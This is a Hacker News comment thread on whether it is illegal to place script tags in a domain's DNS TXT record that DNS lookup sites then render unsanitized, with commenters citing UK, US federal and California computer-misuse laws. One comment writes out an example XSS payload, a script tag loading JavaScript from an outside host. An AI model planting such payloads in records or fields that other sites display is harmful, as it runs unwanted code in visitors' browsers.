Hacker News new | past | comments | ask | show | jobs | submit login

isn't this technically illegal to demonstrate haha?



Why on earth would it be illegal?


I don't think it makes any sense for this to be illegal, but I can point to at least one example where sense didn't necessarily dictate "justice": http://www.ehackingnews.com/2013/12/anonymous-hacker-charged...


What SHOULD be illegal is not sanitizing all inputs.


dam, that got downvoted into oblivion haha. honest question...

although i dont believe it should be, a third party injecting javascript to demonstrate an exploit might be...


Anybody saying "this is illegal" should be required to cite the law they think is broken and explain why the act in question violates that law.


He hasn't injected anything. It's just his public DNS record that this page has chosen to display without sanitizing.


I imagine the UK Computer Misuse Act (eg at Section 3, http://www.legislation.gov.uk/ukpga/1990/18) probably covers it if the person who altered the TXT field does so to cause websites to load code on purpose, that purpose being for example to impair (Section 3(2)(a)) the running of the computer [causing Rick Astley to play, defo counts!] - but it can be read to cover pretty much anything.

Similarly I imagine something like the CFAA (18 USC 1030) probably has broad enough clauses to make this sort of action technically illegal, at least in some cases? But I'm out of my depth on that one.


at least the UK has something somewhat specific (and actually fits XSS quite well).

CA 502c just says: "(3) Knowingly and without permission uses or causes to be used computer services" amongst other very broad subsections

http://support.piercecollege.edu/1521a/References/California...


So do you want to make it illegal to set the contents of your own domain's TXT record to:

"<script src='//peniscorp.com/topkek.js'></script>"

Because that is all this is.


What a bunch of nonsense. TXT records were intended for arbitrary use. Why in the world are these companies pulling data from unknown sources and dumping it RAW into their output? Wow. Good find, IMO.

[1] http://tools.ietf.org/html/rfc1464


Those DNS lookup sites are pulling his information and putting it on their sites. He didn't ask for those records to be published!


Ah, so his TXT records actually serve a genuine purpose? ;)


In which country's jurisdiction?




Join us for AI Startup School this June 16-17 in San Francisco!

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: